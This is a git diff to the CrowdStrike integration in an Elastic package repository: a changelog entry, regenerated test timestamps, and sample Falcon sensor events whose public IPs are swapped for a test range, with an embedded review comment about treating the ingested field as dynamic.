+{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321367236803434269","ContextTimeStamp":"1604855268.323","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"51076","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffffa60a47af4ebd2a76070f0d4f","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-9a50-0669ff09604d","name":"NetworkListenIP6MacV5","timestamp":"1604855268755"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ContextProcessId":"1611521722601","ContextThreadId":"53405065993811","ContextTimeStamp":"1604855280.307","DomainName":"raw.githubusercontent.com","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff6d724d38af99c628fb904626","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"SuspiciousDnsRequest","id":"ffffffff-1111-11eb-885e-02ac336efd4b","name":"SuspiciousDnsRequestV2","timestamp":"1604855323217"} 
+{"ConfigBuild":"100.3.0011603.1","ContextProcessId":"4492535979973","ContextThreadId":"14023068415125","ContextTimeStamp":"1604855315.034","DiskParentDeviceInstanceId":"PCI\\VEN_8086\u0026DEV_31E3\u0026SUBSYS_080C1028\u0026REV_03\\3\u002611583659\u00260\u002690","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeDeviceCharacteristics":"131072","VolumeDeviceObjectFlags":"134479872","VolumeDeviceType":"8","VolumeDriveLetter":"C:","VolumeFileSystemDevice":"\\Ntfs","VolumeFileSystemDriver":"\\FileSystem\\Ntfs","VolumeFileSystemType":"2","VolumeIsEncrypted":"0","VolumeMountPoint":"\\??\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}","VolumeName":"\\Device\\HarddiskVolume4","VolumeRealDeviceName":"\\Device\\HarddiskVolume4","VolumeSectorSize":"512","aid":"ffffffff1990483499a736373600eef7","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeMounted","id":"ffffffff-1111-11eb-9be9-024459b713c5","name":"FsVolumeMountedV6","timestamp":"1604855329102"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321210562584146513","ContextTimeStamp":"1604855127.011","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"53","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffe5ff467b4f0c4fd41a4462bb","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-ae74-065212970c5d","name":"NetworkListenIP4MacV5","timestamp":"1604855128936"} 
+{"AuthenticationId":"999","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855185.108","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\gpsvc.dll","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"219053851298","RpcClientThreadId":"22047924482692","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"gpsvc","TargetProcessId":"224116976578","TargetThreadId":"22920092479704","TokenType":"1","UserName":"user7","aid":"ffffffff59514ea68b4693ddfb9b6643","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStarted","id":"ffffffff-1111-11eb-860c-0606af112d55","name":"HostedServiceStartedV2","timestamp":"1604855184068"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855299.018","EffectiveTransmissionClass":"3","Entitlements":"15","ServiceDisplayName":"wuauserv","TargetProcessId":"661455186053","TargetThreadId":"24238019995551","aid":"ffffffff2b5a4bf5afc6682595faa016","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStopped","id":"ffffffff-1111-11eb-9b11-0602a5689467","name":"HostedServiceStoppedV1","timestamp":"1604855302512"} 
+{"AuthenticationId":"3443175","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1091372257857","ContextThreadId":"36855848099771","ContextTimeStamp":"1604855227.625","DiskParentDeviceInstanceId":"PCI\\VEN_1179\u0026DEV_0113\u0026SUBSYS_00011179\u0026REV_01\\4\u00263ad42678\u00260\u002600E0","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100","FileObject":"18446603341701082336","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"288041","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user12\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\Downloads\\ex.pdf.8e41hf8.partial","TokenType":"1","aid":"ffffffff32cb4abc50bc133b31a69946","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PdfFileWritten","id":"ffffffff-1111-11eb-baea-02dccfbb7779","name":"PdfFileWrittenV11","timestamp":"1604855264313"} +{"AuthenticationId":"3783389","CommandLine":"\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" 
-ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca","ConfigBuild":"1007.3.0012309.1","ConfigStateHash":"3998263252","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\backgroundTaskHost.exe","ImageSubsystem":"2","IntegrityLevel":"4096","MD5HashData":"50d5fd1290d94d46acca0585311e74d5","ParentAuthenticationId":"3783389","ParentBaseFileName":"svchost.exe","ParentProcessId":"2439558094566","ProcessCreateFlags":"525332","ProcessEndTime":"","ProcessParameterFlags":"16385","ProcessStartTime":"1604855181.648","ProcessSxsFlags":"1600","RawProcessId":"22272","RpcClientProcessId":"2439558094566","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37","SessionId":"1","SourceProcessId":"2439558094566","SourceThreadId":"77538684027214","Tags":"41, 12094627905582, 12094627906234","TargetProcessId":"2450046082233","TokenType":"2","UserSid":"S-1-12-1-3697283754-1083485977-2164330645-2516515886","WindowFlags":"128","aid":"ffffffff655344736aca58d17fb570f0","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-8462-02ade3b2f949","name":"ProcessRollup2V18","timestamp":"1604855182022"} +{"AuthenticationId":"326190744","AuthenticationUuid":"98467113-C771-4845-B71B-89B3CE9F93C9","AuthenticationUuidAsString":"13714698-71C7-4548-B71B-89B3CE9F93C9","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","Entitlements":"15","UID":"326190744","UserPrincipal":"user8@dom6","UserSid":"S-1-5-21-3629339319-2376021926-2724479216-652382488","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"UserIdentityMacV2","timestamp":"1604855355388"} +{"BootArgs":" NOEXECUTE=OPTIN 
HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1874387338","EffectiveTransmissionClass":"0","Entitlements":"15","MachineDomain":"","aid":"ffffffffcdb543135e7fcdf8e5a8fbdb","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostInfo","id":"ffffffff-1111-11eb-9bbd-061290dcd983","name":"HostInfoV2","timestamp":"1604855157555"} +{"AuthenticationId":"703298","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2642284486","ContextProcessId":"1161025471861","ContextThreadId":"34929528116709","ContextTimeStamp":"1604851030.593","DiskParentDeviceInstanceId":"USB\\VID_1058\u0026PID_2621\\57583431453939315A4C5255","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"262fbc677256cf4c8d6c6a227285a072c06830873b000000","FileObject":"18446664963104449168","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"1","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"517029","TargetFileName":"\\Device\\HarddiskVolume5\\01.png.tmp$$","TokenType":"1","UserName":"user9","aid":"ffffffff16bf4c7bb5ad755a4722025c","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"GenericFileWritten","id":"ffffffff-1111-11eb-800a-06cecfd73923","name":"GenericFileWrittenV11","timestamp":"1604851031298"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":"1604850899.164","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812"} 
+{"ConfigBuild":"1007.4.0009906.1","ConfigStateHash":"3429017943","ContextProcessId":"66426035996442255","ContextTimeStamp":"1604851098.548","Entitlements":"15","aid":"ffffffff899541b94b9adff8922aa70a","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"FirewallDisabled","id":"ffffffff-1111-11eb-9d4c-02f402df8c1f","name":"FirewallDisabledMacV1","timestamp":"1604851040625"}
diff --git a/packages/crowdstrike/changelog.yml b/packages/crowdstrike/changelog.yml
index 6ad6e921c88..72164b30d22 100644
--- a/packages/crowdstrike/changelog.yml
+++ b/packages/crowdstrike/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.1.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.1.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json
index 572c5e41a08..06abc84c8fa 100644
--- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json
+++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json
@@ -17,7 +17,7 @@ "name": "hostnameofmachine" }, "event": { - "ingested": "2021-07-01T08:21:45.216582900Z", + "ingested": "2021-12-09T13:36:08.382628100Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1045,\n \"eventType\": \"RemoteResponseSessionStartEvent\",\n \"eventCreationTime\": 1582830734000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"6020260b-0398-4d41-999d-5531b55522de\",\n \"HostnameField\": \"hostnameofmachine\",\n \"UserName\": \"first.last@company.com\",\n \"StartTimestamp\": 1582830734\n }\n}", "kind": "event", "action": [ @@ -73,7 +73,7 @@ "name": "hostnameofmachine" }, "event": { - "ingested": "2021-07-01T08:21:45.216593900Z", + "ingested": "2021-12-09T13:36:08.382637400Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1046,\n \"eventType\": \"RemoteResponseSessionEndEvent\",\n \"eventCreationTime\": 1582830772000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"6020260b-0398-4d41-999d-5531b55522de\",\n \"HostnameField\": \"hostnameofmachine\",\n \"UserName\": \"first.last@company.com\",\n \"EndTimestamp\": 1582830772\n }\n}", "kind": "event", "action": [ 
@@ -134,7 +134,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216601800Z", + "ingested": "2021-12-09T13:36:08.382641600Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 0,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581542950710,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"api-client-id:1234567890abcdefghijklmnopqrstuvwxyz\",\n \"UserIp\": \"10.10.0.8\",\n \"OperationName\": \"streamStarted\",\n \"ServiceName\": \"Crowdstrike Streaming API\",\n \"Success\": true,\n \"UTCTimestamp\": 1581542950,\n \"AuditKeyValues\": [\n {\n \"Key\": \"APIClientID\",\n \"ValueString\": \"1234567890abcdefghijklmnopqr\"\n },\n {\n \"Key\": \"partition\",\n \"ValueString\": \"0\"\n },\n {\n \"Key\": \"offset\",\n \"ValueString\": \"-1\"\n },\n {\n \"Key\": \"appId\",\n \"ValueString\": \"siem-connector-v2.0.0\"\n },\n {\n \"Key\": \"eventType\",\n \"ValueString\": \"[UserActivityAuditEvent HashSpreadingEvent RemoteResponseSessionStartEvent RemoteResponseSessionEndEvent DetectionSummaryEvent AuthActivityAuditEvent]\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -210,7 +210,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216631400Z", + "ingested": "2021-12-09T13:36:08.382646400Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581543577147,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581543577147\n }\n}", "category": [ "authentication" 
@@ -265,7 +265,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216635Z", + "ingested": "2021-12-09T13:36:08.382651900Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 2,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581545677554,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"bob@company.com\",\n \"UserIp\": \"192.168.6.3\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581545677554\n }\n}", "category": [ "authentication" @@ -315,7 +315,7 @@ "ip": "192.168.6.13" }, "event": { - "ingested": "2021-07-01T08:21:45.216640600Z", + "ingested": "2021-12-09T13:36:08.382656900Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 3,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1581546248000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"chris@company.com\",\n \"UserIp\": \"192.168.6.13\",\n \"OperationName\": \"update_group\",\n \"ServiceName\": \"groups\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"group_id\",\n \"ValueString\": \"3c80ce30b9654cb4bd15beec6a517e65\"\n },\n {\n \"Key\": \"action_name\",\n \"ValueString\": \"add_group_member\"\n }\n ],\n \"UTCTimestamp\": 1581546248\n }\n}", "kind": "event", "action": "user_activity_audit_event", 
@@ -384,7 +384,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216646100Z", + "ingested": "2021-12-09T13:36:08.382662800Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 4,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601312140,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"requestResetPassword\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601312140,\n \"AuditKeyValues\": [\n {\n \"Key\": \"target_name\",\n \"ValueString\": \"alice@company.com\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -445,7 +445,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216650700Z", + "ingested": "2021-12-09T13:36:08.382667Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 5,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601341730,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601341730\n }\n}", "category": [ "authentication" 
@@ -500,7 +500,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216670700Z", + "ingested": "2021-12-09T13:36:08.382671300Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 6,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601520236,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"changePassword\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601520236,\n \"AuditKeyValues\": [\n {\n \"Key\": \"target_name\",\n \"ValueString\": \"first.last@company.com\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -561,7 +561,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216674800Z", + "ingested": "2021-12-09T13:36:08.382674800Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 7,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601572362,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"userAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601572362\n }\n}", "category": [ "authentication" 
@@ -616,7 +616,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216680300Z", + "ingested": "2021-12-09T13:36:08.382679300Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 8,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601814754,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601814754\n }\n}", "category": [ "authentication" @@ -671,7 +671,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.216688600Z", + "ingested": "2021-12-09T13:36:08.382685300Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 9,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581601820289,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"selfAcceptEula\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581601820289\n }\n}", "category": [ "authentication" 
@@ -721,7 +721,7 @@ "ip": "192.168.6.8" }, "event": { - "ingested": "2021-07-01T08:21:45.216696500Z", + "ingested": "2021-12-09T13:36:08.382690900Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 10,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1581603262000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"detection_update\",\n \"ServiceName\": \"detections\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"detection_id\",\n \"ValueString\": \"ldt:5a6fd0b7347440cd74cb84855a8aee18:17180539745\"\n },\n {\n \"Key\": \"new_state\",\n \"ValueString\": \"in_progress\"\n },\n {\n \"Key\": \"assigned_to\",\n \"ValueString\": \"First Last\"\n },\n {\n \"Key\": \"assigned_to_uid\",\n \"ValueString\": \"first.last@company.com\"\n }\n ],\n \"UTCTimestamp\": 1581603262\n }\n}", "kind": "event", "action": "user_activity_audit_event", diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json index e42ac3aec43..6be007be91c 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-events.log-expected.json 
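Review bot: Every hunk in test-falcon-audit-events.log-expected.json changes only the `event.ingested` value, which is the wall-clock time of the regeneration run and unrelated to the IP replacement this commit is about, so these hunks are review noise and will churn again on the next `elastic-package test pipeline -g`. If the data stream's pipeline test config does not already declare it as a dynamic field, adding `dynamic_fields:` with `event.ingested: ".*"` to the `test-*-config.yml` (presumably the mechanism this test runner uses; verify against the elastic-package docs) would keep these expected files stable and limit future diffs to the fields that actually carry assertions, such as the `source.ip`/`related.ip` values changed elsewhere in this commit. The ingested timestamp carries no assertion value for the pipeline under test, so nothing is lost by ignoring it.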
@@ -62,7 +62,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-01T08:21:45.615781200Z", + "ingested": "2021-12-09T13:36:09.420125Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 294564,\n \"eventType\": \"DetectionSummaryEvent\",\n \"eventCreationTime\": 1582101000000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"ProcessStartTime\": 1536846339,\n \"ProcessEndTime\": 0,\n \"ProcessId\": 38684386611,\n \"ParentProcessId\": 38682494050,\n \"ComputerName\": \"alice-laptop\",\n \"UserName\": \"alice\",\n \"DetectName\": \"Process Terminated\",\n \"DetectDescription\": \"Terminated a process related to the deletion of backups, which is often indicative of ransomware activity.\",\n \"Severity\": 4,\n \"SeverityName\": \"High\",\n \"FileName\": \"explorer.exe\",\n \"FilePath\": \"\\\\Device\\\\HarddiskVolume1\\\\Windows\",\n \"CommandLine\": \"C:\\\\Windows\\\\Explorer.EXE\",\n \"SHA256String\": \"6a671b92a69755de6fd063fcbe4ba926d83b49f78c42dbaeed8cdb6bbc57576a\",\n \"MD5String\": \"ac4c51eb24aa95b77f705ab159189e24\",\n \"MachineDomain\": \"CORP-DOMAIN\",\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/ec86abd353824e96765ecbe18eb4f0b4\",\n \"SensorId\": \"7c808b4c8878433287eea53d4a8c3268\",\n \"DetectId\": \"ldt:ec86abd353824e96765ecbe18eb4f0b4:38655257584\",\n \"LocalIP\": \"192.168.12.51\",\n \"MACAddress\": \"00-00-00-11-22-33\",\n \"Tactic\": \"Malware\",\n \"Technique\": \"Ransomware\",\n \"Objective\": \"Falcon Detection Method\",\n \"PatternDispositionDescription\": \"Prevention, process killed.\",\n \"PatternDispositionValue\": 16,\n \"PatternDispositionFlags\": {\n \"Indicator\": false,\n \"Detect\": false,\n \"InddetMask\": false,\n \"SensorOnly\": false,\n \"Rooting\": false,\n \"KillProcess\": true,\n \"KillSubProcess\": false,\n \"QuarantineMachine\": false,\n \"QuarantineFile\": false,\n \"PolicyDisabled\": false,\n \"KillParent\": false,\n \"OperationBlocked\": false,\n 
\"ProcessBlocked\": false\n }\n }\n}", "kind": "alert", "action": "Prevention, process killed.", @@ -141,7 +141,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-07-01T08:21:45.615786500Z", + "ingested": "2021-12-09T13:36:09.420134300Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1824,\n \"eventType\": \"IncidentSummaryEvent\",\n \"eventCreationTime\": 1583295476766,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"IncidentStartTime\": 1583295228,\n \"IncidentEndTime\": 1583295470,\n \"FalconHostLink\": \"https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"State\": \"open\",\n \"FineScore\": 1.2\n }\n}", "kind": "alert", "action": "incident", @@ -186,7 +186,7 @@ ] }, "event": { - "ingested": "2021-07-01T08:21:45.615794200Z", + "ingested": "2021-12-09T13:36:09.420138700Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 22865,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1593186952000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"Crowdstrike\",\n \"UserIp\": \"\",\n \"OperationName\": \"quarantined_file_update\",\n \"ServiceName\": \"quarantined_files\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"quarantined_file_id\",\n \"ValueString\": \"35b35a53da374816a6b471cf09e12019_a076d3121743755f2d4f8d4d5807f0bc013177f7847d09b48e76de88ace08c78\"\n },\n {\n \"Key\": \"action_taken\",\n \"ValueString\": \"quarantined\"\n }\n ],\n \"UTCTimestamp\": 1593186952\n }\n}", "kind": "event", "action": "user_activity_audit_event", diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log index 6a811c1efb2..87070601c11 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log 
+++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log
@@ -71,7 +71,7 @@
 },
 "event": {
 "UserId": "first.last@company.com",
- "UserIp": "165.225.220.184",
+ "UserIp": "67.43.156.15",
 "OperationName": "saml2Assert",
 "ServiceName": "Crowdstrike Authentication",
 "Success": true,
diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json
index fb573efedc8..b7a41c8d63e 100644
--- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json
+++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-sample.log-expected.json
@@ -43,7 +43,7 @@ "name": "TESTDEVICE01" }, "event": { - "ingested": "2021-08-13T09:13:03.062166Z", + "ingested": "2021-12-09T13:36:09.744769800Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"offset\": 70689,\n \"eventType\": \"FirewallMatchEvent\",\n \"eventCreationTime\": 1595248906000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"DeviceId\": \"718af202ab2c4ba5b6a5d10d39c0e0a5\",\n \"CustomerId\": \"12345a1bc2d34fghi56jk7890lmno12p\",\n \"Ipv\": \"ipv4\",\n \"CommandLine\": \"\",\n \"ConnectionDirection\": \"1\",\n \"EventType\": \"FirewallRuleIP4Matched\",\n \"Flags\": {\n \"Audit\": false,\n \"Log\": false,\n \"Monitor\": true\n },\n \"HostName\": \"TESTDEVICE01\",\n \"ICMPCode\": \"\",\n \"ICMPType\": \"\",\n \"ImageFileName\": \"\",\n \"LocalAddress\": \"10.37.60.194\",\n \"LocalPort\": \"445\",\n \"MatchCount\": 1,\n \"MatchCountSinceLastReport\": 1,\n \"NetworkProfile\": \"2\",\n \"PID\": \"206158879910\",\n \"PolicyName\": \"PROD-FW-Workstations-General\",\n \"PolicyID\": \"74e7f1552a3a4d90a6d65578642c8584\",\n \"Protocol\": \"6\",\n \"RemoteAddress\": \"10.37.60.21\",\n \"RemotePort\": \"54952\",\n \"RuleAction\": \"2\",\n \"RuleDescription\": \"\",\n \"RuleFamilyID\": \"fec73e96a1bf4481be582c3f89b234fa\",\n \"RuleGroupName\": \"SMB Rules\",\n \"RuleName\": \"Inbound SMB Block \\u0026 Log Private\",\n \"RuleId\": \"4877172638743447345\",\n \"Status\": \"\",\n 